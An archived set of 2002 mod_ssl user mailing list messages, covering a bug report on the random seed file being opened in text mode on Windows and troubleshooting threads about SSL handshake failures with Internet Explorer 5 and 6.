To: modssl-users@modssl.org
Subject: [BugDB] ssl_rand_seed needs to open in binary mode (PR#705)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: EKR
Version: 2.8.8-1.3.24
OS: NT 4.0
Submission from: (NULL) (198.144.203.242)


ssl_engine_rand.c:ssl_rand_seed() fopens the random file in text mode. On Unix
this is fine but on Windows this means that it will stop as soon as it sees an
EOD in the file. Since the random file is often random binary data, this means
that with high probability the entire file will not be read. This can lead to
insufficient amounts of entropy being delivered to OpenSSL. The fix is to
change:

                if ((fp = ap_pfopen(p, pRandSeed->cpPath, "r")) == NULL)
                    continue;

to:

                if ((fp = ap_pfopen(p, pRandSeed->cpPath, "rb")) == NULL)
                    continue;
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 14:16:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA22524; Fri, 17 May 2002 14:15:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from qeo02001.t-online.net id OAA22501; Fri, 17 May 2002 14:14:53 +0200 (MET DST)
From: b.courtin@t-online.net
Received: from qeo09161.de.t-online.corp (qeo09161 [192.168.248.161])
	by qeo02001.t-online.net (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id OAA21695
	for ; Fri, 17 May 2002 14:14:48 +0200
X-Authentication-Warning: qeo02001.t-online.net: Host qeo09161 [192.168.248.161] claimed to be qeo09161.de.t-online.corp
Received: from qeo00200.de.t-online.corp ([192.168.195.200]) by qeo09161.de.t-online.corp with Microsoft SMTPSVC(5.0.2195.2966);
	 Fri, 17 May 2002 14:13:01 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: handshake problem with IE
Date: Fri, 17 May 2002 14:13:00 +0200
Message-ID: <60F1F87A64834D45A1EBAE9618305FB86E412C@qeo00200>
Thread-Topic: handshake problem with IE
Thread-Index: AcH9CdTOoH+zgAgARNa3do6PK0iUawAkgieg
To: 
X-OriginalArrivalTime: 17 May 2002 12:13:01.0185 (UTC) FILETIME=[3066BF10:01C1FD9C]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id OAA22515
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: b.courtin@t-online.net
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Heribert,

are you sure these errors are caused by access/commmunication with the Microsoft Internet Explorer 6.0.2600.000? Do they only occour when the webserver is accessed by a browser (i.e. MS IE6) or on a regulary basis: are you sure your web-servers are not behind any kind of load balancer which is sending "pings" or "keepalive" requests to your webserver? 

Kind regards,
B. Courtin



-----Original Message-----
From: Heribert Steuer [mailto:steuer@stockmanagement.de]
Sent: Thursday, May 16, 2002 7:12 PM
To: modssl-users@modssl.org
Subject: handshake problem with IE


Hello everybody,

i was already reading the posts on this issue, but all suggested tips
didnt help at all.
server is apache (see version numbers below) running on OpenBSD
3.0stable
client is Microsoft Internet Explorer 6.0.2600.000 with 128bit
encryption


the logs say the following  (at least they are full of it):

[Thu May 16 18:52:12 2002] [error] mod_ssl: SSL handshake interrupted by
system [Hint: Stop button pressed in browser?!] (System error follows)
[Thu May 16 18:52:12 2002] [error] System: Connection reset by peer
(errno: 54)


ssl_engine_log is :

[16/May/2002 18:52:13 06053] [info]  Connection to child 0 established
(server cyrus.freiburg.peh:443, client 192.168.30.30)
[16/May/2002 18:52:13 06053] [info]  Seeding PRNG with 1160 bytes of
entropy
[16/May/2002 18:52:13 06053] [trace] OpenSSL: Handshake: start
[16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: before/accept
initialization
[16/May/2002 18:52:13 06053] [debug] OpenSSL: read 11/11 bytes from
BIO#00A259C0 [mem: 00CCE000] (BIO dump follows)
[...]
[16/May/2002 18:52:13 06053] [debug] OpenSSL: read 67/67 bytes from
BIO#00A259C0 [mem: 00CCE00B] (BIO dump follows)
[...]
[16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 read client
hello A
[16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 write server
hello A
[16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 write
certificate A
[16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 write server
done A
[16/May/2002 18:52:13 06053] [debug] OpenSSL: write 762/762 bytes to
BIO#00A259C0 [mem: 00CA3000] (BIO dump follows)
[...]
[16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 flush data
[16/May/2002 18:52:13 06053] [debug] OpenSSL: I/O error, 5 bytes
expected to read on BIO#00A259C0 [mem: 00CCE000]
[16/May/2002 18:52:13 06053] [trace] OpenSSL: Exit: error in SSLv3 read
client certificate A
[16/May/2002 18:52:13 06053] [trace] OpenSSL: Exit: error in SSLv3 read
client certificate A
[16/May/2002 18:52:13 06053] [error] SSL handshake interrupted by system
[Hint: Stop button pressed in browser?!] (System error follows)
[16/May/2002 18:52:13 06053] [error] System: Connection reset by peer
(errno: 54)



OpenSSL 0.9.6b [engine] 9 Jul 2001
mod_ssl version 2.8
mod_perl-1.26

Server version: Apache/1.3.19 (Unix)
Server built:   Oct 15 2001 11:48:41
Server's Module Magic Number: 19990320:10
Server compiled with....
 -D EAPI
 -D HAVE_MMAP
 -D HAVE_SHMGET
 -D USE_MMAP_SCOREBOARD
 -D USE_MMAP_FILES
 -D USE_FLOCK_SERIALIZED_ACCEPT
 -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
 -D HTTPD_ROOT="/var/www"
 -D SUEXEC_BIN="/usr/sbin/suexec"
 -D DEFAULT_PIDLOG="logs/httpd.pid"
 -D DEFAULT_SCOREBOARD="logs/httpd.scoreboard"
 -D DEFAULT_LOCKFILE="logs/httpd.lock"
 -D DEFAULT_XFERLOG="logs/access_log"
 -D DEFAULT_ERRORLOG="logs/error_log"
 -D TYPES_CONFIG_FILE="conf/mime.types"
 -D SERVER_CONFIG_FILE="conf/httpd.conf"
 -D ACCESS_CONFIG_FILE="conf/access.conf"
 -D RESOURCE_CONFIG_FILE="conf/srm.conf"


if theres a need for more details, just let me know. this problem occurs
on 3 different machines
(all running OpenBSD with different versions of apache/mod_ssl)
i hope someone can help.


thanks in advance

Heribert Steuer
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 14:30:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA23450; Fri, 17 May 2002 14:29:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from angel.sabetonline.com id OAA23438; Fri, 17 May 2002 14:28:54 +0200 (MET DST)
Received: (qmail 30688 invoked by uid 1001); 17 May 2002 13:26:19 -0000
Received: from unknown (HELO gateway) (192.168.3.115)
  by 192.168.3.7 with SMTP; 17 May 2002 13:26:19 -0000
Date: Fri, 17 May 2002 13:28:48 +0100
From: Louis Sabet 
To: modssl-users@modssl.org
Subject: IE 5.00 - 5.01 SSL Connection Failures
Message-Id: <20020517132027.1EA7.LOUIS@webtedium.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Mailer: Becky! ver. 2.00.08
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Louis Sabet 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi List,

I work for a mobile phone retail company in the UK - www.mobiles.co.uk

Recently we discovered that several of our customers were unable to
complete the secure portions of their orders. The only common factor
with all these problems were that all customers were using IE 5.00 to IE
5.01.

Under Internet Explorer they receive "Page Connot Be Found". With
Netscape all works fine, and with all other recent Internet Explorer
versions, a successful connection can be made.

I found nothing useful on the Microsoft site other than this:
http://support.microsoft.com/default.aspx?scid=kb;EN-US;q244302

It may be the root of the problem, but we cannot ask the 33% of our
customers who use IE5 to patch their machines before accessing our site.

It is obvious that MOST connections to https sites can be made from IE5,
or it would have been better documented.

I contacted Verisign to find out if there was a reason some certificates
were useable with IE5, and others weren't, but I found their technical
support to be quite useless.

My last option is to ask you guys whether this could be a configuration
issue - or whether there is some configuration tweak I can make to get
around this problem for our IE5 users.

Best regards,

Louis

-- 
Louis Sabet 
http://www.webtedium.com/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 14:54:30 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA24719; Fri, 17 May 2002 14:53:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from raq76.uk2net.com.local id OAA24667; Fri, 17 May 2002 14:52:26 +0200 (MET DST)
Received: from kursa ([62.189.189.145])
	by raq76.uk2net.com.local (8.9.3/8.9.3) with ESMTP id NAA20446
	for ; Fri, 17 May 2002 13:52:23 +0100
From: "Jeff" 
To: 
Subject: RE: IE 5.00 - 5.01 SSL Connection Failures
Date: Fri, 17 May 2002 13:51:15 +0100
Message-ID: <003f01c1fda1$9d053250$3264a8c0@kursa>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
In-Reply-To: <20020517132027.1EA7.LOUIS@webtedium.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


MS IE 5.00 was a flawed release, that MS very quickly (4 weeks) replaced
with 5.01, mainly for security reasons. You should be able to get any
reasonable users (corporate or otherwise) to upgrade asap. MSIE 5.00 has
some serious bugs when using SSL and cacheing, so you may be able to
tweak all your users caching settings, and also to look at making your
pages non-cacheable. I have to say though that in our experience with a
group of 10 users of 5.00 it was far easier to get them to switch to
Netscape until their 5.01 (in fact they went for 5.5) to arrive.

The more SSL connections that are used, the more likely that failures
will occur - in downloading stylesheets, javascript, images etc, leading
to odd bugs and ugly pages.


The problems you describe with 5.01, I have seen when SSL keepalive
settings were enabled on the web-server. The SSLKeepAlive settings were
invented to speed up a clients access to your site, so that as
subsequent requests for images, css, etc etc were made, the SSL
negotiation overhead was short-circuited. Unfortunately the MS 5.xx
browsers never quite got it right. We use Apache, and this is the
setting in httpd.conf
  SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
downgrade-1.0 force-response-1.0

You can check your SSL logs to see if the keepalive settings are active
- it they are you will see an incrementing number associated with each
request from the same user that indicates the SSL negotiation was
short-cut, and that previously negotiated keys are being used.

'nokeepalive' is fractionally slower, but at least your users will not
get the regular 'page cannot be found' issue.

As to sharing Client Certs between IE and NS - we do this happily for NS
4.0-4.75 and MSIE 5.01-6.0 without any issues.


Regards
Jeff




-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Louis Sabet
Sent: 17 May 2002 13:29
To: modssl-users@modssl.org
Subject: IE 5.00 - 5.01 SSL Connection Failures


Hi List,

I work for a mobile phone retail company in the UK - www.mobiles.co.uk

Recently we discovered that several of our customers were unable to
complete the secure portions of their orders. The only common factor
with all these problems were that all customers were using IE 5.00 to IE
5.01.

Under Internet Explorer they receive "Page Connot Be Found". With
Netscape all works fine, and with all other recent Internet Explorer
versions, a successful connection can be made.

I found nothing useful on the Microsoft site other than this:
http://support.microsoft.com/default.aspx?scid=kb;EN-US;q244302

It may be the root of the problem, but we cannot ask the 33% of our
customers who use IE5 to patch their machines before accessing our site.

It is obvious that MOST connections to https sites can be made from IE5,
or it would have been better documented.

I contacted Verisign to find out if there was a reason some certificates
were useable with IE5, and others weren't, but I found their technical
support to be quite useless.

My last option is to ask you guys whether this could be a configuration
issue - or whether there is some configuration tweak I can make to get
around this problem for our IE5 users.

Best regards,

Louis

-- 
Louis Sabet 
http://www.webtedium.com/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 14:55:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA24769; Fri, 17 May 2002 14:54:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from spiff.wake.tec.nc.us id OAA24739; Fri, 17 May 2002 14:53:50 +0200 (MET DST)
Received: from localhost (dale@localhost)
	by spiff.wake.tec.nc.us (AIX4.3/8.9.3/8.9.3) with ESMTP id IAA36936
	for ; Fri, 17 May 2002 08:52:29 -0400
Date: Fri, 17 May 2002 08:52:29 -0400 (EDT)
From: Dale Weaver 
X-Sender: dale@spiff
To: modssl-users@modssl.org
Subject: Re: Runs on local...but can't see it anywhere else
In-Reply-To: <3CE4A03D.24CDD2AE@fel.tno.nl>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dale Weaver 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Make sure your server is set up in DNS for your domain as well.

---------------------------------------------------------------------

"Let me up to get my bat and I'll thank you."
   -- Calvin
___

Dale Weaver                               dale@mail.wake.tec.nc.us
UNIX Systems Administrator                (919) 662-3508	
Wake Technical Community College          fax (919) 779-3360

On Fri, 17 May 2002, DG Speekenbrink wrote:

> Hi,
> 
> This sounds more like a general Apache config problem.
> is it possible to request pages with the regular http:// request?
> 
> If not, some settings in your httpd.conf are the problem.
> 
> Good luck,
> 
> Dennis
> 
> Alex Earl wrote:
> > 
> > Hi!
> > 
> > First off I would like to thank you for your help and knowledge! I enjoy
> > this forum a lot!
> > 
> > I have set up mod_ssl with Apache 1.3 and everything seems to run just fine
> > on the local machine. I can curl https://localhost (and the actual server
> > address) and get the right stuff...but when I try to access it from anywhere
> > else I get a server not found error. Any ideas?!
> > 
> > Thanks!
> > 
> > Alex Earl
> > 
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 15:19:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA27146; Fri, 17 May 2002 15:18:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id PAA27108; Fri, 17 May 2002 15:17:52 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g4HDHVv03757
	for ; Fri, 17 May 2002 13:17:36 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Fri, 17 May 2002 14:17:28 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F020670A3@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: IE 5.00 - 5.01 SSL Connection Failures
Date: Fri, 17 May 2002 14:17:27 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Just to concur with Jeff, IE5.00 is useless. At the end of June Microsoft
are dropping support for IE5.01SP2. I can't remember right now where I found
that out, and 

http://support.microsoft.com/default.aspx?scid=%2fdefault.aspx%3fscid%3dfh%3
ben-us%3bobsprodi 

Doesn't list IE5.01 as obsolete, although IE5.5SP2 is listed as a
replacement for other versions of IE. Of course, the obsolete list is
incomplete anyway (Office 97 is missing, as was mentioned in this weeks
Woody's Office Watch. I'm the one who got it in there).

A minimum of IE5.5SP2 is required now, although of course people will be
using older versions. As an organisation we are dependant on IE (since we
use VBScript a lot) and so we are moving up to IE5.5SP2 gradually.

Having said that, I've just posted to Bugtraq a comment that the latest
update (MS02-23, or Q321232 depending on your preferences) is refusing to
install on some Windows 2000 machines. 

Don't we just love Microsoft?

- 
John Airey
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

If Charles Darwin knew a fraction of what scientists know today, he'd never
have written the Origin of the Species.


> -----Original Message-----
> From: Jeff [mailto:jaa.modssl@aquabolt.com]
> Sent: 17 May 2002 13:51
> To: modssl-users@modssl.org
> Subject: RE: IE 5.00 - 5.01 SSL Connection Failures
> 
> 
> 
> MS IE 5.00 was a flawed release, that MS very quickly (4 
> weeks) replaced
> [snip]
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Louis Sabet
> Sent: 17 May 2002 13:29
> To: modssl-users@modssl.org
> Subject: IE 5.00 - 5.01 SSL Connection Failures
> 
> 
> Hi List,
> 
> I work for a mobile phone retail company in the UK - www.mobiles.co.uk
> 
> Recently we discovered that several of our customers were unable to
> complete the secure portions of their orders. The only common factor
> with all these problems were that all customers were using IE 
> 5.00 to IE
> 5.01.
> 
> Under Internet Explorer they receive "Page Connot Be Found". With
> Netscape all works fine, and with all other recent Internet Explorer
> versions, a successful connection can be made.
> 
> I found nothing useful on the Microsoft site other than this:
> http://support.microsoft.com/default.aspx?scid=kb;EN-US;q244302
> 
> It may be the root of the problem, but we cannot ask the 33% of our
> customers who use IE5 to patch their machines before 
> accessing our site.
> 
> It is obvious that MOST connections to https sites can be 
> made from IE5,
> or it would have been better documented.
> 
> I contacted Verisign to find out if there was a reason some 
> certificates
> were useable with IE5, and others weren't, but I found their technical
> support to be quite useless.
> 
> My last option is to ask you guys whether this could be a 
> configuration
> issue - or whether there is some configuration tweak I can make to get
> around this problem for our IE5 users.
> 
> Best regards,
> 
> Louis
> 
> -- 
> Louis Sabet 
> http://www.webtedium.com/
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 15:28:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA27783; Fri, 17 May 2002 15:27:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from angel.sabetonline.com id PAA27755; Fri, 17 May 2002 15:26:49 +0200 (MET DST)
Received: (qmail 22516 invoked by uid 1001); 17 May 2002 14:24:15 -0000
Received: from unknown (HELO gateway) (192.168.3.115)
  by 192.168.3.7 with SMTP; 17 May 2002 14:24:15 -0000
Date: Fri, 17 May 2002 14:26:46 +0100
From: Louis Sabet 
To: modssl-users@modssl.org
Subject: Re: IE 5.00 - 5.01 SSL Connection Failures
In-Reply-To: <003f01c1fda1$9d053250$3264a8c0@kursa>
References: <20020517132027.1EA7.LOUIS@webtedium.com> <003f01c1fda1$9d053250$3264a8c0@kursa>
Message-Id: <20020517141653.1EAC.LOUIS@webtedium.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Mailer: Becky! ver. 2.00.08
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Louis Sabet 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


On Fri, 17 May 2002 13:51:15 +0100
"Jeff"  wrote:

> MS IE 5.00 was a flawed release, that MS very quickly (4 weeks) replaced
> with 5.01, mainly for security reasons. You should be able to get any
> reasonable users (corporate or otherwise) to upgrade asap. MSIE 5.00 has
> some serious bugs when using SSL and cacheing, so you may be able to
> tweak all your users caching settings, and also to look at making your
> pages non-cacheable. I have to say though that in our experience with a
> group of 10 users of 5.00 it was far easier to get them to switch to
> Netscape until their 5.01 (in fact they went for 5.5) to arrive.

Unfortunately in this sector of retail, our target audience is very
fickle, and an abundance of similar online retailers in recent years
have made this an extremely competitive market. We cannot afford to
aggravate any customers at this point.

In addition, a large proportion of our customers have little or no
previous IT experience and cannot be expected to apply patches no matter
how trivial it may seem to us!
 
***SNIP***
 
> The problems you describe with 5.01, I have seen when SSL keepalive
> settings were enabled on the web-server. The SSLKeepAlive settings were
> invented to speed up a clients access to your site, so that as
> subsequent requests for images, css, etc etc were made, the SSL
> negotiation overhead was short-circuited. Unfortunately the MS 5.xx
> browsers never quite got it right. We use Apache, and this is the
> setting in httpd.conf
>   SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
> downgrade-1.0 force-response-1.0

I checked our httpd.conf, and indeed we have the same line in all our
SSL sites. So this particular problem must lie elsewhere.

I'll agree with peoples' comments on IE5 being terrible, but
unfortunately as an online retailer we have no choice as to what our
customers access our website with, and a disturbing number of customers
(33%) happen to be using IE5.00 to 5.01.

If anyone else has any comments, they would be very much appreciated at
this point!
 
> You can check your SSL logs to see if the keepalive settings are active
> - it they are you will see an incrementing number associated with each
> request from the same user that indicates the SSL negotiation was
> short-cut, and that previously negotiated keys are being used.
> 
> 'nokeepalive' is fractionally slower, but at least your users will not
> get the regular 'page cannot be found' issue.
> 
> As to sharing Client Certs between IE and NS - we do this happily for NS
> 4.0-4.75 and MSIE 5.01-6.0 without any issues.
> 
> 
> Regards
> Jeff
> 
> 
> 
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Louis Sabet
> Sent: 17 May 2002 13:29
> To: modssl-users@modssl.org
> Subject: IE 5.00 - 5.01 SSL Connection Failures
> 
> 
> Hi List,
> 
> I work for a mobile phone retail company in the UK - www.mobiles.co.uk
> 
> Recently we discovered that several of our customers were unable to
> complete the secure portions of their orders. The only common factor
> with all these problems were that all customers were using IE 5.00 to IE
> 5.01.
> 
> Under Internet Explorer they receive "Page Connot Be Found". With
> Netscape all works fine, and with all other recent Internet Explorer
> versions, a successful connection can be made.
> 
> I found nothing useful on the Microsoft site other than this:
> http://support.microsoft.com/default.aspx?scid=kb;EN-US;q244302
> 
> It may be the root of the problem, but we cannot ask the 33% of our
> customers who use IE5 to patch their machines before accessing our site.
> 
> It is obvious that MOST connections to https sites can be made from IE5,
> or it would have been better documented.
> 
> I contacted Verisign to find out if there was a reason some certificates
> were useable with IE5, and others weren't, but I found their technical
> support to be quite useless.
> 
> My last option is to ask you guys whether this could be a configuration
> issue - or whether there is some configuration tweak I can make to get
> around this problem for our IE5 users.
> 
> Best regards,
> 
> Louis
> 
> -- 
> Louis Sabet 
> http://www.webtedium.com/
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
Louis Sabet 
http://www.webtedium.com/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 15:39:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA28536; Fri, 17 May 2002 15:38:43 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id PAA28466; Fri, 17 May 2002 15:37:48 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g4HDbCv05138
	for ; Fri, 17 May 2002 13:37:33 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Fri, 17 May 2002 14:37:09 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F020670A5@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: IE 5.00 - 5.01 SSL Connection Failures
Date: Fri, 17 May 2002 14:37:08 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Simply send them to http://windowsupdate.microsoft.com, and talk them
through it if you have to. 

Things could get worse for them if they don't anyway.

- 
John Airey
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

If Charles Darwin knew a fraction of what scientists know today, he'd never
have written the Origin of the Species.




- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 16:43:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA02902; Fri, 17 May 2002 16:42:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from slkcpop5.slkc.uswest.net id QAA02867; Fri, 17 May 2002 16:41:49 +0200 (MET DST)
Received: (qmail 20798 invoked by uid 0); 17 May 2002 14:41:43 -0000
Received: from dialupd159.logn.uswest.net (HELO ace) (63.230.11.160)
  by slkcpop5.slkc.uswest.net with SMTP; 17 May 2002 14:41:43 -0000
Date: Fri, 17 May 2002 08:41:02 -0600
Message-ID: <001d01c1fdb0$df383a00$3401fea9@ace>
From: "Alex Earl" 
To: modssl-users@modssl.org
References:  <003001c1fd0b$651b9aa0$b56d7b81@RM426> <3CE4A03D.24CDD2AE@fel.tno.nl>
Subject: Re: Runs on local...but can't see it anywhere else
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
